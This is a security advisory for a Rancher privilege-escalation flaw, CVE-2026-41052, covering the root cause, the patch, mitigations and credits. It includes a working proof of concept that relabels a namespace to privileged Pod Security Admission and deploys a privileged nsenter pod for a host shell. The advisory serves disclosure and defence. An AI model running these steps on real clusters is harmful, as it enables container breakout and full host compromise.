critical · 8.4CVE-2026-41052Jul 1, 2026

CVE-2026-41052: Rancher Project Owner Privilege Escalation to Host

Shubham Kandhare
Security Engagement Manager, SecureLayer7

A Rancher user with Project Owner access can relabel a namespace to use the 'privileged' Pod Security Admission profile, then deploy containers that break out of standard isolation and reach host-leve

Packagegithub.com/rancher/rancher
Ecosystemgo
Affected>= 2.14.0, < 2.14.2
Fixed in2.14.2

The problem

The built-in `project-owner` RoleTemplate granted a wildcard `*` verb on `management.cattle.io/projects`. That wildcard silently included the custom `updatepsa` verb, which Rancher's admission webhook uses to gate Pod Security Admission label changes on namespaces.

A user with only Cluster Member access who also owns a project could therefore call `updatepsa`, flip a namespace to the `privileged` PSA profile, and deploy workloads that disable all container security boundaries. The result is container breakout and full host access on any node that schedules the workload.

Proof of concept

A working proof-of-concept for CVE-2026-41052 in github.com/rancher/rancher, with the exact payload below.

bash
# Step 1 – relabel the namespace to privileged PSA (requires updatepsa, which project-owner had via *)
kubectl label namespace <your-namespace> \
  pod-security.kubernetes.io/enforce=privileged \
  pod-security.kubernetes.io/enforce-version=latest \
  pod-security.kubernetes.io/warn=privileged \
  pod-security.kubernetes.io/audit=privileged \
  --overwrite

# Step 2 – deploy a privileged pod to escape to the host
kubectl apply -f - <<EOF
apiVersion: v1
kind: Pod
metadata:
  name: priv-escape
  namespace: <your-namespace>
spec:
  hostPID: true
  hostNetwork: true
  containers:
  - name: shell
    image: alpine
    command: ["nsenter", "--mount=/proc/1/ns/mnt", "--", "/bin/sh"]
    securityContext:
      privileged: true
    stdin: true
    tty: true
EOF

The root cause is the wildcard `verbs: ["*"]` in the built-in `project-owner` RoleTemplate for the `projects` resource in the `management.cattle.io` API group. Rancher's webhook checks for the `updatepsa` verb before allowing PSA label mutations on namespaces, but because `*` matches every verb, project owners already had that permission implicitly, bypassing the intended access control gate.

The patch (PR #55061, commit 2800aaac) replaced `"*"` with an explicit allowlist: `get`, `update`, `delete`, `patch`, `create`, `list`, `watch`, `deletecollection`. That list intentionally omits `updatepsa`, so the webhook check now correctly denies the label mutation for project owners.

This maps to CWE-305 (Authentication Bypass by Primary Weakness) and the MITRE ATT&CK techniques T1611 (Escape to Host) and T1068 (Exploitation for Privilege Escalation).

The fix

Upgrade to Rancher v2.12.10, v2.13.6, or v2.14.2. If an immediate upgrade is not possible, replace the built-in `project-owner` role with a custom RoleTemplate that sets verbs for `management.cattle.io/projects` to the explicit list `[get, update, delete, patch, create, list, watch, deletecollection]` and omits `*` and `updatepsa`.

Any existing wildcard-based project-owner bindings must be re-created against the restricted role.

Reported by MMunier and Trolldemorted.

References: [1][2][3][4][5]

Related research